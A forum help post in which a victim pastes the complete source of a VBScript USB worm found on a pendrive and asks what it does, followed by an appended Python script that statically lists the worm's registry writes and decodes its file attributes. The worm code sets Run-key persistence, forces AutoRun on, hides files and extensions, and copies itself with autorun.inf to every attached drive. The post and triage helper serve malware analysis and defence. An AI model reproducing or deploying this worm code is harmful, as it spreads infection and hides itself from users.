
VB Script Help

Hello everybody, I am a C/C++ programmer but I have a Visual Basic question because my computer is being attacked by someone else.

I don't know what the function of the code is. Could you please explain it to me? I only know that the file is hidden and I cannot format or delete from my pendrive.

Below is the code:

  1. 'mark
  2. 'slow and silent (sas)1.0
  3. on error resume next
  4. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
  5. atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
  6. set fs = createobject("Scripting.FileSystemObject")
  7. set mf = fs.getfile(Wscript.ScriptFullname)
  8. set rg = createobject("WScript.Shell")
  9. rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","10"
  10. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
  11. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
  12. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
  13. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
  14. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  15. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
  16. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
  17. dim text,size
  18. size = mf.size
  19. set text=mf.openastextstream(1,-2)
  20. cc = text.readline
  21. do while not text.atendofstream
  22. mysource=mysource&text.readline
  23. mysource=mysource & vbcrlf
  24. loop
  25. Set winpath = fs.getspecialfolder(0)
  26. set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
  27. tf.attributes = 32
  28. set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
  29. tf.write "'ker"&vbcrlf&mysource
  30. tf.close
  31. set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
  32. tf.attributes = 39
  33. Set winpath = fs.getspecialfolder(0)
  34. set tf = fs.getfile(winpath & "\boot.ini")
  35. tf.attributes = 32
  36. set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
  37. tf.write "'ker"&vbcrlf&mysource
  38. tf.close
  39. set tf = fs.getfile(winpath & "\boot.ini")
  40. tf.attributes = 39
  41. if cc = "'mark" then
  42. rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  43. end if
  44. if cc = "'marker" then
  45. rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  46. end if
  47. do
  48. for each flashdrive in fs.drives
  49. hm="'mark"
  50. If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
  51. if(flashdrive.drivetype=2) then
  52. hm = "'marker"
  53. end if
  54. set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
  55. tf.attributes =32
  56. set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
  57. tf.write hm&vbcrlf&mysource
  58. tf.close
  59. set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
  60. tf.attributes =39
  61. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  62. tf.attributes = 32
  63. set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
  64. tf.write atr
  65. tf.close
  66. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  67. tf.attributes=39
  68. end if
  69. rg.R
  70. egWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
  71. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
  72. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
  73. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
  74. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
  75. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  76. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
  77. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
  78. next
  79. if cc <> "'mark" then
  80. Wscript.sleep 10000
  81. end if
  82. loop while cc <> "'mark"
  83.  
  84.  
Any ideas and recommendations are greatly appreciated by me and others.

Thanks for your help.
Apr 11 '07 #1
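
Added example (not part of the original post): a static triage helper in Python that reads a VBScript like the one posted above without running it, lists each registry value it writes together with what that write means, and decodes the numeric file attributes it sets. `SAMPLE` is a few lines excerpted from the post; the function names and category labels are this example's own.

```python
import re

# Scripting.FileSystemObject attribute bits used by the posted script.
ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}

# Registry path patterns and what a write there means (labels are this example's).
KEY_MEANING = [
    (r"\\CurrentVersion\\Run\\", "persistence: value is launched at logon"),
    (r"\\NoDriveTypeAutoRun$", "AutoRun policy: 0 leaves AutoRun on for every drive type"),
    (r"\\Explorer\\Advanced\\", "Explorer view setting for hidden files/extensions"),
]
REGWRITE = re.compile(r'\.regwrite\s+"([^"]+)"\s*,\s*(.+)$', re.I)
ATTRSET = re.compile(r"\.attributes\s*=\s*(\d+)", re.I)

# A few lines excerpted from the post, used only as parser input (never executed).
SAMPLE = r'''
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
tf.attributes = 32
tf.attributes =39
'''

def decode_attributes(value):
    """Return the names of the attribute bits set in a numeric attributes value."""
    return [name for bit, name in sorted(ATTR_BITS.items()) if value & bit]

def triage(script_text):
    """Collect registry writes and attribute assignments from VBScript source text."""
    findings = {"registry": [], "attributes": set()}
    for line in script_text.splitlines():
        m = REGWRITE.search(line)
        if m:
            key, data = m.group(1), m.group(2).strip()
            meaning = next((why for pat, why in KEY_MEANING
                            if re.search(pat, key, re.I)), "other")
            findings["registry"].append((key, data, meaning))
        m = ATTRSET.search(line)
        if m:
            findings["attributes"].add(int(m.group(1)))
    return findings

if __name__ == "__main__":
    report = triage(SAMPLE)
    for key, data, meaning in report["registry"]:
        print(f"{meaning}\n  {key} = {data}")
    for value in sorted(report["attributes"]):
        print(f"attributes = {value}: {'+'.join(decode_attributes(value))}")
```

Attribute value 39 decodes to ReadOnly, Hidden, System and Archive, and with `ShowSuperHidden` set to 0 Explorer does not display files that carry both Hidden and System.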